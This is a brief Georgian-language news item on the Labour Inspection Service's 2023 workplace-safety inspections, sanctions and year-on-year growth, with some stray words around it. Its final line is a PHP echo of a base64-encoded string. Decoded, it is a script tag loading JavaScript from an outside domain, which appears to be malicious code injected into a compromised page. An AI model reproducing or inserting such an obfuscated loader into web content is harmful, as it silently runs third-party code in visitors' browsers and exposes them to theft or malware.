celsiusi
ავერსი საქკაბელი

 შრომის ინსპექციის სამსახურის მიერ 2023 წელს უსაფრთხოების მიმართულებით ჩატარდა 3765 ინსპექტირება. ნორმების დარღვევისთვის 2527 შემთხვევაში გამოყენებულ იქნა შემდეგი სანქციები:

• 1523 შემთხვევაში გაფრთხილება
• 361 შემთხვევაში საქმიანობის შეჩერება
• 643 შემთხვევაში ჯარიმა
 
2023 წლის განმავლობაში ჩატარებული ინსპექტირება 81 904 დასაქმებულ პირს შეეხო. მნიშვნელოვანია, რომ 2023 წელს განხორციელებული ინსპექტირებები 50% აღემატება 2022 წლის მონაცემებს.
აღსანიშნავია ისიც, რომ პირველივე შემოწმებისას ობიექტების 51%-მა აღმოფხვრა გამოვლენილი დარღვევები.
 
შრომის ინსპექციის სამსახურის მანდატი ეხება ეკონომიკური საქმიანობის განმახორციელებელ ყველა ობიექტს, უწყება უფლებამოსილია დღე-ღამის ნებისმიერ მონაკვეთში ჩაატაროს ინსპექტირება წინასწარი გაფრთხილების გარეშე.
220
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");